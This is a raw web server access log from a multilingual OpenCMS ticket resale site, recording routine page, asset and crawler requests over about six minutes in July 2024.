47.128.35.9 - - [19/Jul/2024:06:14:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
40.77.167.49 - - [19/Jul/2024:06:14:21 +0200] "GET /ticket2/opencms/en/venue/?venueid=4264E775-2245-34EC-AB9C-8E5203A0BEEE HTTP/1.1" 200 70716
66.249.76.4 - - [19/Jul/2024:06:14:33 +0200] "GET /ticket2/opencms/nl/buy?page=1&edid=620EBF00-ABE0-9BB5-0F04-F120B08CF11C HTTP/1.1" 200 112582
47.128.111.35 - - [19/Jul/2024:06:14:35 +0200] "GET /ticket2/opencms/fi/buy/?catid=E92E6B1B-7CD1-74B1-312C-265A7D8125D0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82819
47.128.111.35 - - [19/Jul/2024:06:14:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.111.35 - - [19/Jul/2024:06:14:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
194.163.141.13 - - [19/Jul/2024:06:14:37 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=028282C2-0C5B-764B-9EA9-7BEDB9FB5AF4&sortorder=desc&column=price HTTP/1.1" 200 89220
37.123.143.245 - - [19/Jul/2024:06:14:42 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:06:14:42 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
66.249.79.231 - - [19/Jul/2024:06:14:49 +0200] "GET /ticket2/opencms/fr/buy?page=1&edid=F73B99E5-B80D-7F20-3343-FD9C622F3B77 HTTP/1.1" 200 92137
194.163.141.13 - - [19/Jul/2024:06:14:58 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=028282C2-0C5B-764B-9EA9-7BEDB9FB5AF4&sortorder=desc&column=row HTTP/1.1" 200 89220
47.128.110.85 - - [19/Jul/2024:06:15:00 +0200] "GET /ticket2/opencms/sv/magazine/ HTTP/1.1" 200 112544
47.128.110.85 - - [19/Jul/2024:06:15:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.110.85 - - [19/Jul/2024:06:15:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
39.60.210.50 - - [19/Jul/2024:06:15:09 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/liverpool/?gad_source=1&gclid=EAIaIQobChMIjoL476CyhwMVAJCDBx3V6CuKEAAYASABEgK7MvD_BwE HTTP/1.1" 200 84961
66.249.79.6 - - [19/Jul/2024:06:15:11 +0200] "GET /ticket2/opencms/fi/venue/?venueid=1D8D6A4F-9ED4-4698-838F-ADCA81DD135B HTTP/1.1" 200 72309
66.249.76.1 - - [19/Jul/2024:06:15:13 +0200] "GET /ticket2/opencms/sv/venue/?venueid=176D3FFD-8008-78D4-93A3-4EAE24F36FFF HTTP/1.1" 200 71738
66.249.76.1 - - [19/Jul/2024:06:15:13 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=DE73DB51-4178-AA85-D066-1C5C2E4D27B9 HTTP/1.1" 200 100906
66.249.79.6 - - [19/Jul/2024:06:15:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
37.60.249.191 - - [19/Jul/2024:06:15:19 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=05C0128A-02F8-C30A-2654-0B16EDFDCD9B&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.111.97 - - [19/Jul/2024:06:15:24 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=2DE12DDA-A5FB-C1C6-CB20-FBF873FB032B HTTP/1.1" 200 82463
47.128.111.97 - - [19/Jul/2024:06:15:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.111.97 - - [19/Jul/2024:06:15:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
194.163.141.13 - - [19/Jul/2024:06:15:32 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=028282C2-0C5B-764B-9EA9-7BEDB9FB5AF4&sortorder=desc&column=section HTTP/1.1" 200 89220
114.119.144.51 - - [19/Jul/2024:06:15:47 +0200] "GET /ticket2/opencms/en/venue/?venueid=22D725DE-51C6-0A7B-C9AD-59BC777D6F28 HTTP/1.1" 200 70727
114.119.143.145 - - [19/Jul/2024:06:15:47 +0200] "GET /ticket2/opencms/en/sell/?edid=37A75E19-2D32-09E3-B22B-553C3AC90B6B HTTP/1.1" 302 -
47.128.51.16 - - [19/Jul/2024:06:15:49 +0200] "GET /ticket2/opencms/no/buy/?catid=BE041FBE-C1A7-918C-EB61-99ED02D12F5B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 82980
47.128.51.16 - - [19/Jul/2024:06:15:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.51.16 - - [19/Jul/2024:06:15:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.143.145 - - [19/Jul/2024:06:15:51 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
194.163.141.13 - - [19/Jul/2024:06:15:56 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=02E6797B-74DD-6A46-6871-51DA2CCD4C5A&sortorder=asc&column=section HTTP/1.1" 200 85941
52.167.144.16 - - [19/Jul/2024:06:15:57 +0200] "GET /ticket2/opencms/sv/tickets/real_madrid/getafe.html HTTP/1.1" 200 84644
47.128.56.212 - - [19/Jul/2024:06:16:15 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=26594C33-56CE-F529-FAF3-61AB33F74A3B HTTP/1.1" 200 75765
47.128.56.212 - - [19/Jul/2024:06:16:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.56.212 - - [19/Jul/2024:06:16:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
194.163.141.13 - - [19/Jul/2024:06:16:28 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0316A403-E2C6-83FE-1C69-1D4D8C9ED062 HTTP/1.1" 200 88512
47.128.57.71 - - [19/Jul/2024:06:16:34 +0200] "GET /ticket2/opencms/es/buy/?edid=B62F8ADF-FB26-8030-EC23-674FBF49AA39 HTTP/1.1" 200 72706
47.128.57.71 - - [19/Jul/2024:06:16:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.57.71 - - [19/Jul/2024:06:16:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.98.201 - - [19/Jul/2024:06:16:38 +0200] "GET /ticket2/opencms/no/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=C871EAE3-C584-718A-9795-07CDEF43FA75 HTTP/1.1" 200 82974
66.249.68.69 - - [19/Jul/2024:06:16:38 +0200] "GET /ticket2/opencms/sv/magazine/article?title=la-liga-real-madrid-vunnit-flest-titlar HTTP/1.1" 200 75775
47.128.98.201 - - [19/Jul/2024:06:16:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.98.201 - - [19/Jul/2024:06:16:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.2 - - [19/Jul/2024:06:16:47 +0200] "GET /ticket2/opencms/sv/sell/?edid=71FF0DDB-994C-2EA5-7C18-3DECE9AE5101 HTTP/1.1" 302 -
66.249.79.172 - - [19/Jul/2024:06:16:49 +0200] "GET /ticket2/opencms/sv/login/?url=/sv/sell/ HTTP/1.1" 200 73621
194.163.141.13 - - [19/Jul/2024:06:16:54 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0319A834-E4F8-1CF4-F8AD-79318D5E2742&sortorder=desc&column=price HTTP/1.1" 200 88323
37.60.249.191 - - [19/Jul/2024:06:16:59 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=05C0128A-02F8-C30A-2654-0B16EDFDCD9B&sortorder=asc&column=section HTTP/1.1" 404 -
157.55.39.60 - - [19/Jul/2024:06:17:00 +0200] "GET /ticket2/opencms/en/search.html?searchQuery= HTTP/1.1" 200 88513
47.128.32.134 - - [19/Jul/2024:06:17:05 +0200] "GET /ticket2/opencms/no/buy/?catid=4B941E1B-E4E2-C53E-C693-9FA91BBA9AD5&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 84342
95.154.18.70 - - [19/Jul/2024:06:17:05 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=%2Fsv%2Fbuy%2Findex.html%3Fpage%3D1%26edid%3DF0845893-AB25-79ED-E273-8681A31846EB%26hlv%3D666d445b-ea40-4564-8788-64080a01000f%23v409669745 HTTP/1.1" 200 224
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=F0845893-AB25-79ED-E273-8681A31846EB&hlv=666d445b-ea40-4564-8788-64080a01000f HTTP/1.1" 200 113328
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
47.128.32.134 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 72814
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/venue/stamford_bridge.png HTTP/1.1" 200 51972
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/0.gif HTTP/1.1" 200 43
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/sv/ask-form.html HTTP/1.1" 200 2950
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
47.128.32.134 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/two_man.png HTTP/1.1" 200 3407
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/ticket_info_button.png HTTP/1.1" 200 3820
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_left.gif HTTP/1.1" 200 232
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_center.gif HTTP/1.1" 200 66
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/button1_right.gif HTTP/1.1" 200 232
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
95.154.18.70 - - [19/Jul/2024:06:17:06 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
95.154.18.70 - - [19/Jul/2024:06:17:07 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
95.154.18.70 - - [19/Jul/2024:06:17:07 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
95.154.18.70 - - [19/Jul/2024:06:17:08 +0200] "GET /ticket2/opencms/img/arrow-down.png HTTP/1.1" 200 192
95.154.18.70 - - [19/Jul/2024:06:17:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.154.18.70 - - [19/Jul/2024:06:17:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
95.154.18.70 - - [19/Jul/2024:06:17:11 +0200] "GET /ticket2/opencms/venue/stamford_bridge.png HTTP/1.1" 200 51972
114.119.145.239 - - [19/Jul/2024:06:17:16 +0200] "GET /ticket2/opencms/en/sell/?edid=87117E43-C5AC-00C7-B091-B85E20437E88 HTTP/1.1" 302 -
114.119.145.239 - - [19/Jul/2024:06:17:19 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
194.163.141.13 - - [19/Jul/2024:06:17:21 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=03208385-D01E-F3E2-867D-8006D926BFD1&sortorder=desc&column=price HTTP/1.1" 200 88978
47.128.56.184 - - [19/Jul/2024:06:17:28 +0200] "GET /ticket2/opencms/fr/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=BDD8C04C-DD99-1C07-B5F3-F2AB98D157E8 HTTP/1.1" 200 82223
47.128.56.184 - - [19/Jul/2024:06:17:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.56.184 - - [19/Jul/2024:06:17:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
40.77.167.49 - - [19/Jul/2024:06:17:38 +0200] "GET /ticket2/opencms/en/venue/?venueid=58B4DCF4-B9EB-0383-CA2D-EA5126921C04 HTTP/1.1" 200 70710
95.154.18.70 - - [19/Jul/2024:06:17:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/fancybox_overlay.png HTTP/1.1" 200 1003
95.154.18.70 - - [19/Jul/2024:06:17:39 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/fancybox_sprite@2x.png HTTP/1.1" 404 -
63.143.42.252 - - [19/Jul/2024:06:17:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
194.163.141.13 - - [19/Jul/2024:06:17:43 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=03208385-D01E-F3E2-867D-8006D926BFD1&sortorder=desc&column=row HTTP/1.1" 200 88978
63.143.42.252 - - [19/Jul/2024:06:17:45 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
40.77.167.241 - - [19/Jul/2024:06:17:46 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=418F640D-FED9-8D6C-3AD1-01149267CC74 HTTP/1.1" 200 87251
47.128.38.59 - - [19/Jul/2024:06:17:52 +0200] "GET /ticket2/opencms/fr/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&npage=1 HTTP/1.1" 200 241294
47.128.38.59 - - [19/Jul/2024:06:17:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.59 - - [19/Jul/2024:06:17:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.148.108 - - [19/Jul/2024:06:17:57 +0200] "GET /ticket2/opencms/en/venue/?venueid=A003754C-3E1C-9E13-64E9-6F827A08D00B HTTP/1.1" 200 70694
194.163.141.13 - - [19/Jul/2024:06:18:13 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=03337102-274E-EF7A-5BBB-8B18B768E4C2 HTTP/1.1" 200 86780
66.249.79.173 - - [19/Jul/2024:06:18:13 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=59FF6FC0-0E24-887E-599D-D93F8931961C HTTP/1.1" 200 109332
114.119.132.104 - - [19/Jul/2024:06:18:40 +0200] "GET /ticket2/opencms/en/sell/?edid=D7E9CE50-42B5-5263-3DE7-3A8324966326 HTTP/1.1" 302 -
114.119.132.104 - - [19/Jul/2024:06:18:44 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
195.191.219.130 - - [19/Jul/2024:06:18:45 +0200] "GET /ticket2/opencms/de/robots.txt HTTP/1.1" 404 -
194.163.141.13 - - [19/Jul/2024:06:18:48 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0341AF20-4F3F-63CA-C1A9-8C1AA13C52B1&sortorder=desc&column=price HTTP/1.1" 200 89221
47.128.38.32 - - [19/Jul/2024:06:18:51 +0200] "GET /ticket2/opencms/fr/buy/?edid=1FC397CE-A835-91DE-8251-09DE1CD1F661 HTTP/1.1" 200 72058
47.128.38.32 - - [19/Jul/2024:06:18:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.32 - - [19/Jul/2024:06:18:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
195.191.219.130 - - [19/Jul/2024:06:18:54 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 94735
47.128.20.47 - - [19/Jul/2024:06:18:56 +0200] "GET /ticket2/opencms/nl/buy/?catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 214346
47.128.20.47 - - [19/Jul/2024:06:18:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.20.47 - - [19/Jul/2024:06:18:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.60.249.191 - - [19/Jul/2024:06:19:02 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=0CE65760-D75C-1E4C-DE34-E03273F5FD83&sortorder=asc&column=price HTTP/1.1" 404 -
216.244.66.245 - - [19/Jul/2024:06:19:02 +0200] "GET /ticket2/opencms/se/robots.txt HTTP/1.1" 404 -
83.185.35.29 - - [19/Jul/2024:06:19:07 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/?wbraid=CloKCQjw1920BhDPARJJAHLBw5RKw_h0W3vzQaHLSg946tW4NngTPhlZunQNNg5dCBYblMQvvza22a7bWO_BunpSNQB7qVReu7AKOPqZ1yUIeboGrPUC5BoCCZw HTTP/1.1" 200 76552
83.185.35.29 - - [19/Jul/2024:06:19:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
52.167.144.16 - - [19/Jul/2024:06:19:12 +0200] "GET /ticket2/opencms/dk/buy?page=1&edid=99C77A16-8AF9-4675-97DE-42A41C4ECB4F HTTP/1.1" 200 115282
194.163.141.13 - - [19/Jul/2024:06:19:15 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0341AF20-4F3F-63CA-C1A9-8C1AA13C52B1&sortorder=desc&column=row HTTP/1.1" 200 89221
66.249.79.172 - - [19/Jul/2024:06:19:19 +0200] "GET /ticket2/opencms/de/buy?page=1&edid=E0A8CE5D-A2DA-F5EB-6814-85F787FE51D7 HTTP/1.1" 200 97526
47.128.96.242 - - [19/Jul/2024:06:19:21 +0200] "GET /ticket2/opencms/fi/buy/?catid=515A9A29-35A0-2DB8-262B-AEF122DB04F6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82818
47.128.96.242 - - [19/Jul/2024:06:19:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.96.242 - - [19/Jul/2024:06:19:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
40.77.167.19 - - [19/Jul/2024:06:19:29 +0200] "GET /ticket2/opencms/en/venue/?countryid=E6D1D9A5-7003-75BD-6D2C-CB60A7D92969 HTTP/1.1" 200 100101
40.77.167.19 - - [19/Jul/2024:06:19:31 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=2BF6E643-E634-803F-5E85-36ED669FBD74 HTTP/1.1" 200 93998
114.119.155.23 - - [19/Jul/2024:06:19:32 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=B9AF967E-6A2C-9F16-4FB0-0AAF3EDE2C61 HTTP/1.1" 200 86207
37.123.143.245 - - [19/Jul/2024:06:19:43 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:06:19:43 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
194.163.141.13 - - [19/Jul/2024:06:19:43 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0341AF20-4F3F-63CA-C1A9-8C1AA13C52B1&sortorder=desc&column=section HTTP/1.1" 200 89221
47.128.44.210 - - [19/Jul/2024:06:19:45 +0200] "GET /ticket2/opencms/no/buy/?catid=36394212-F82E-F845-399B-42BED55969CC&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 82986
47.128.44.210 - - [19/Jul/2024:06:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.44.210 - - [19/Jul/2024:06:19:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
194.163.141.13 - - [19/Jul/2024:06:20:05 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=04B62BE8-DBA1-6837-BCBE-53D7E0288921 HTTP/1.1" 200 87659
47.128.57.22 - - [19/Jul/2024:06:20:13 +0200] "GET /ticket2/opencms/no/buy/?catid=F03B8ADD-988E-AE6A-8DBA-AF502C691C60&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82458
47.128.57.22 - - [19/Jul/2024:06:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.57.22 - - [19/Jul/2024:06:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
